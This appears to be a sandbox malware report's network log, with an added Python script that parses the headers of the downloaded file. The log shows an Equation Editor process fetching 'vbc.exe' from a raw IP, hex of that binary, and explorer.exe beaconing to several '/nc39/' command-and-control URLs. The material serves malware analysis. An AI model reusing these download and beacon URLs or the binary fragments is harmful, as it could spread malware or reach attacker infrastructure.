May 14, 2022 15:20:49.415096045 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.415138960 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.721462965 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.737354040 CEST | 80 | 49174 | 34.102.136.180 | 192.168.2.22
May 14, 2022 15:20:54.454102039 CEST | 49175 | 80 | 192.168.2.22 | 198.54.117.212
May 14, 2022 15:20:54.627938032 CEST | 80 | 49175 | 198.54.117.212 | 192.168.2.22
May 14, 2022 15:20:54.628040075 CEST | 49175 | 80 | 192.168.2.22 | 198.54.117.212
May 14, 2022 15:20:54.628197908 CEST | 49175 | 80 | 192.168.2.22 | 198.54.117.212
May 14, 2022 15:20:54.801981926 CEST | 80 | 49175 | 198.54.117.212 | 192.168.2.22
May 14, 2022 15:20:54.802022934 CEST | 80 | 49175 | 198.54.117.212 | 192.168.2.22
May 14, 2022 15:21:00.123545885 CEST | 49176 | 80 | 192.168.2.22 | 164.155.217.57
May 14, 2022 15:21:00.311521053 CEST | 80 | 49176 | 164.155.217.57 | 192.168.2.22
May 14, 2022 15:21:00.314990997 CEST | 49176 | 80 | 192.168.2.22 | 164.155.217.57
May 14, 2022 15:21:00.315134048 CEST | 49176 | 80 | 192.168.2.22 | 164.155.217.57
May 14, 2022 15:21:00.712800980 CEST | 80 | 49176 | 164.155.217.57 | 192.168.2.22
May 14, 2022 15:21:00.731961012 CEST | 80 | 49176 | 164.155.217.57 | 192.168.2.22
May 14, 2022 15:21:00.732011080 CEST | 80 | 49176 | 164.155.217.57 | 192.168.2.22
May 14, 2022 15:21:00.732199907 CEST | 49176 | 80 | 192.168.2.22 | 164.155.217.57
May 14, 2022 15:21:00.746476889 CEST | 49176 | 80 | 192.168.2.22 | 164.155.217.57
May 14, 2022 15:21:00.932132006 CEST | 80 | 49176 | 164.155.217.57 | 192.168.2.22
May 14, 2022 15:21:05.987340927 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.148293972 CEST | 80 | 49177 | 23.81.214.26 | 192.168.2.22
May 14, 2022 15:21:06.148436069 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.148781061 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.311940908 CEST | 80 | 49177 | 23.81.214.26 | 192.168.2.22
May 14, 2022 15:21:06.311974049 CEST | 80 | 49177 | 23.81.214.26 | 192.168.2.22
May 14, 2022 15:21:06.311989069 CEST | 80 | 49177 | 23.81.214.26 | 192.168.2.22
May 14, 2022 15:21:06.312130928 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.312165976 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.313327074 CEST | 49177 | 80 | 192.168.2.22 | 23.81.214.26
May 14, 2022 15:21:06.474150896 CEST | 80 | 49177 | 23.81.214.26 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 15:20:49.249929905 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
May 14, 2022 15:20:49.270263910 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
May 14, 2022 15:20:54.426791906 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
May 14, 2022 15:20:54.448314905 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
May 14, 2022 15:20:59.833756924 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
May 14, 2022 15:21:00.015923977 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
May 14, 2022 15:21:05.800946951 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
May 14, 2022 15:21:05.972409964 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
May 14, 2022 15:21:11.315015078 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8
May 14, 2022 15:21:11.426719904 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 14, 2022 15:20:49.249929905 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.arjimni.com | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.426791906 CEST | 192.168.2.22 | 8.8.8.8 | 0xca6d | Standard query (0) | www.contractornurd.com | A (IP address) | IN (0x0001)
May 14, 2022 15:20:59.833756924 CEST | 192.168.2.22 | 8.8.8.8 | 0x1666 | Standard query (0) | www.tw-life.net | A (IP address) | IN (0x0001)
May 14, 2022 15:21:05.800946951 CEST | 192.168.2.22 | 8.8.8.8 | 0x723c | Standard query (0) | www.yiwanggkm.com | A (IP address) | IN (0x0001)
May 14, 2022 15:21:11.315015078 CEST | 192.168.2.22 | 8.8.8.8 | 0x150 | Standard query (0) | www.skinclash.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 14, 2022 15:20:49.270263910 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | No error (0) | www.arjimni.com | arjimni.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 15:20:49.270263910 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | No error (0) | arjimni.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | www.contractornurd.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
May 14, 2022 15:20:54.448314905 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
May 14, 2022 15:21:00.015923977 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | www.tw-life.net | | 164.155.217.57 | A (IP address) | IN (0x0001)
May 14, 2022 15:21:05.972409964 CEST | 8.8.8.8 | 192.168.2.22 | 0x723c | No error (0) | www.yiwanggkm.com | | 23.81.214.26 | A (IP address) | IN (0x0001)
May 14, 2022 15:21:11.426719904 CEST | 8.8.8.8 | 192.168.2.22 | 0x150 | No error (0) | www.skinclash.com | traff-6.hugedomains.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 15:21:11.426719904 CEST | 8.8.8.8 | 192.168.2.22 | 0x150 | No error (0) | traff-6.hugedomains.com | hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
May 14, 2022 15:21:11.426719904 CEST | 8.8.8.8 | 192.168.2.22 | 0x150 | No error (0) | hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | | 18.119.154.66 | A (IP address) | IN (0x0001)
May 14, 2022 15:21:11.426719904 CEST | 8.8.8.8 | 192.168.2.22 | 0x150 | No error (0) | hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | | 3.140.13.188 | A (IP address) | IN (0x0001)
                                                      • 104.168.33.31
                                                      • www.arjimni.com
                                                      • www.contractornurd.com
                                                      • www.tw-life.net
                                                      • www.yiwanggkm.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 104.168.33.31 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 14, 2022 15:19:31.529700994 CEST | 2 | OUT | GET /75/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 104.168.33.31
Connection: Keep-Alive
May 14, 2022 15:19:31.645406961 CEST | 3 | IN | HTTP/1.1 200 OK
Date: Sat, 14 May 2022 13:19:31 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Fri, 13 May 2022 09:36:08 GMT
ETag: "4065c-5dee1677234a5"
Accept-Ranges: bytes
Content-Length: 263772
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 
86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@
                                                      May 14, 2022 15:19:31.645431042 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 b0 8a 7a 00 8d 45 a4
                                                      Data Ascii: U\}t+}FEuHzHPuuu@BSV5zEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                                      May 14, 2022 15:19:31.645451069 CEST6INData Raw: 7a 00 e9 f9 16 00 00 8b 88 80 8b 7a 00 89 88 20 8b 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 20 8b 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 20 8b 7a 00 57 e9 31 16 00 00 8b 0d 70 7a 7a 00 8b 35 50
                                                      Data Ascii: zz zE4 z3;#MDE4 zW1pzz5P@;tuQEzz;PQjuP@nmjPEJ;tZj\VIf>ff;u9]tCFtuEuF;t=uu
                                                      May 14, 2022 15:19:31.645468950 CEST7INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                                                      Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                                      May 14, 2022 15:19:31.645490885 CEST9INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 1c 37 00 00 56 e8 97 3c 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 17 4b 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 d8 45 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                                                      Data Ascii: uGSVj7V<;j9]t!VK9]|PuE;tEV$@4jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuU
                                                      May 14, 2022 15:19:31.645509005 CEST10INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 6e 0e 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                                                      Data Ascii: DujY@VUXuhWSunPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE!@ffM^h>j;YUfn9]M
                                                      May 14, 2022 15:19:31.645526886 CEST11INData Raw: 08 e8 f8 37 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 47 09 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                                                      Data Ascii: 7W4@MSSuuGu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]
                                                      May 14, 2022 15:19:31.645544052 CEST13INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 dc 3a 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                                                      Data Ascii: tu@j:uuu@u@jVuu_^[U}ujhju@@E}uEF=zT@u @PEQPT@EPuD@EPhu,30y@y;rPjdQ@UV39ut
                                                      May 14, 2022 15:19:31.645562887 CEST14INData Raw: 79 00 2b 35 60 ce 40 00 57 03 74 24 14 ff 15 f8 80 40 00 33 db 05 f4 01 00 00 3b f3 a3 ac 8a 7a 00 0f 8e 2a 01 00 00 ff 35 44 f7 79 00 e8 46 01 00 00 53 53 ff 35 60 ce 40 00 ff 35 1c a0 40 00 ff 15 60 81 40 00 89 35 40 f7 79 00 89 1d 30 f7 79 00
                                                      Data Ascii: y+5`@Wt$@3;z*5DyFSS5`@5@`@5@y0y0x8y@+Dy;07yWV=Dy5h@=l@9zt)9@zu!@yS+4y+D$`@0yYhh@-p@t@26|j5p@+t!VU5@
                                                      May 14, 2022 15:19:31.645581961 CEST15INData Raw: 72 50 0f b7 05 3e a3 40 00 99 0f a4 c2 10 c1 e0 10 8b d8 0f b7 05 3c a3 40 00 0f b7 0d 38 a3 40 00 99 0b d8 0f b7 05 3a a3 40 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c3 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 0a 4f 4f 81 ff 00 30 7b 00 73 e9 33 db
                                                      Data Ascii: rP>@<@8@:@3;uW;tOO0{s30{E@rAfW&=Wh8{.,Wh@{#,]LzE!h,@V,th(@V,h@V+H{WV(@Vt h!
                                                      May 14, 2022 15:19:31.759368896 CEST17INData Raw: 50 ff 74 24 2c ff 74 24 2c 68 00 00 00 80 57 56 68 80 00 00 00 ff 15 24 82 40 00 a3 68 1f 7a 00 57 e8 eb d4 ff ff 85 c0 74 08 6a 02 58 e9 bf 00 00 00 e8 c2 00 00 00 39 3d 40 8b 7a 00 0f 85 83 00 00 00 6a 05 ff 35 68 1f 7a 00 ff 15 50 82 40 00 68
                                                      Data Ascii: Pt$,t$,hWVh$@hzWtjX9=@zj5hzP@h<@v*uh0@h*5(@@SUWuSh@WS-dzz@zzWih@@WP5z,@jVj+Wt9=lzzNj.Bj"3_^
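The response body above begins with an MZ/PE image, and the report only shows its first kilobytes. The following is an added example, not code from the Joe Sandbox report: a minimal PE header reader run over the leading 0x298 bytes transcribed from the "Data Raw" dump (DOS header, stub, COFF and optional header, and the five section headers), which is enough to recover what the second stage is without the rest of the file. The NSIS-specific `.ndata` section name and the overlay calculation are standard PE facts; `CONTENT_LENGTH` is the value from the response headers. The triage thresholds (16x virtual-to-raw ratio) are this example's own choice.

```python
"""PE header triage over the first bytes of the vbc.exe response body.

Added example, not code from the Joe Sandbox report. HEADER_HEX is transcribed
from the report's "Data Raw" dump of the 200 OK body for GET /75/vbc.exe, from
offset 0 to the end of the section table (0x298 bytes); the rest of the file is
not needed to read the headers. CONTENT_LENGTH is taken from the response.
"""
import struct
from datetime import datetime, timezone

HEADER_HEX = (
    # IMAGE_DOS_HEADER; e_lfanew at offset 0x3c is 0xd8
    "4d5a90000300000004000000ffff0000b80000000000000040000000" "00000000"
    + "00" * 28 + "d8000000"
    # DOS stub ("This program cannot be run in DOS mode.") and Rich header, not interpreted
    + "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "a8216047ec400e14ec400e14ec400e14" "2f4f5114ee400e14ec400f1449400e14"
    "2f4f5314e3400e14b8633e14e0400e14" "2b460814ed400e1452696368ec400e14"
    + "00" * 24
    # IMAGE_FILE_HEADER at 0xd8: "PE\0\0", i386, 5 sections, link time, optional header 0xe0 bytes
    + "504500004c010500a99a4f61" "0000000000000000e0000f01"
    # IMAGE_OPTIONAL_HEADER32 including the 16 data directories (import, resource, IAT set)
    + "0b01060000680000" "00123a0000080000" "4636000000100000" "0080000000004000"
    "0010000000020000" "0400000006000000" "0400000000000000" "00a03b0000040000"
    "0000000002004085" "0000100000100000" "0000100000100000" "0000000010000000"
    "0000000000000000" "04850000a0000000" "00903b00500a0000" "0000000000000000"
    + "00" * 64 + "00800000b0020000" + "00" * 24
    # IMAGE_SECTION_HEADER x5: name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
    + "2e74657874000000" "c467000000100000" "0068000000040000" + "00" * 12 + "20000060"
    + "2e72646174610000" "9a13000000800000" "00140000006c0000" + "00" * 12 + "40000040"
    + "2e64617461000000" "b8eb390000a00000" "0006000000800000" + "00" * 12 + "400000c0"
    + "2e6e646174610000" "0000010000903a00" "0000000000000000" + "00" * 12 + "800000c0"
    + "2e72737263000000" "500a000000903b00" "000c000000860000" + "00" * 12 + "40000040"
)
HEADER = bytes.fromhex(HEADER_HEX)
CONTENT_LENGTH = 263772  # Content-Length of the response in the report
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x80


def parse_pe(data):
    """Read the COFF header, the PE32 optional header and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    size_of_image, = struct.unpack_from("<I", data, opt + 56)
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rsize": rsize, "rptr": rptr, "flags": flags})
    return {"machine": machine, "timestamp": stamp, "entry": entry,
            "image_base": image_base, "size_of_image": size_of_image, "sections": sections}


def build_time(pe):
    """Link timestamp as UTC text (trivially forgeable, but worth recording)."""
    return datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def entry_section(pe):
    for s in pe["sections"]:
        if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["rsize"]):
            return s["name"]
    return None


def overlay_size(pe, file_size):
    """Bytes on disk after the last section; NSIS keeps its compressed archive there."""
    return file_size - max(s["rptr"] + s["rsize"] for s in pe["sections"])


def triage(pe, file_size):
    notes = []
    if any(s["name"] == ".ndata" for s in pe["sections"]):
        notes.append(".ndata section present: section layout of an NSIS-built installer")
    for s in pe["sections"]:
        if s["flags"] & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
            notes.append(f"{s['name']}: uninitialized, 0x{s['vsize']:x} bytes reserved in memory")
        elif s["rsize"] and s["vsize"] > 16 * s["rsize"]:
            notes.append(f"{s['name']}: 0x{s['vsize']:x} virtual vs 0x{s['rsize']:x} raw, mostly zero-filled")
    if overlay_size(pe, file_size) > 0:
        notes.append(f"overlay: {overlay_size(pe, file_size)} bytes after the last section")
    return notes


if __name__ == "__main__":
    pe = parse_pe(HEADER)
    print(f"machine=0x{pe['machine']:x} sections={len(pe['sections'])} linked={build_time(pe)} UTC")
    print(f"entry=0x{pe['entry']:x} in {entry_section(pe)}, SizeOfImage=0x{pe['size_of_image']:x}")
    for note in triage(pe, CONTENT_LENGTH):
        print(" -", note)
```

Run against the transcribed bytes it reports an i386 PE32 with five sections, the entry point inside `.text`, a `.data` section declaring about 3.8 MB of virtual space backed by 0x600 bytes on disk, an uninitialized `.ndata` section, and roughly 226 KB of overlay behind the 37,376 bytes the headers account for: the packaging of an NSIS installer, with the actual payload in the overlay rather than in any section. Only the first 2-17 kB of the body are in the report, so the overlay itself cannot be examined from this page.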


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 14, 2022 15:20:49.298163891 CEST | 282 | OUT | GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1
Host: www.arjimni.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 14, 2022 15:20:49.414908886 CEST | 282 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Sat, 14 May 2022 13:20:49 GMT
Content-Type: text/html
Content-Length: 291
ETag: "627e7264-123"
Via: 1.1 google
Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49175 | 198.54.117.212 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 14, 2022 15:20:54.628197908 CEST | 283 | OUT | GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1
Host: www.contractornurd.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID: 3
Source IP: 192.168.2.22
Source Port: 49176
Destination IP: 164.155.217.57
Destination Port: 80
Process: C:\Windows\explorer.exe
Timestamp: May 14, 2022 15:21:00.315134048 CEST
kBytes transferred: 284
Direction: OUT
Data: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.tw-life.net
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Timestamp: May 14, 2022 15:21:00.731961012 CEST
kBytes transferred: 285
Direction: IN
Data: HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 14 May 2022 13:21:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 466
                                                      Connection: close
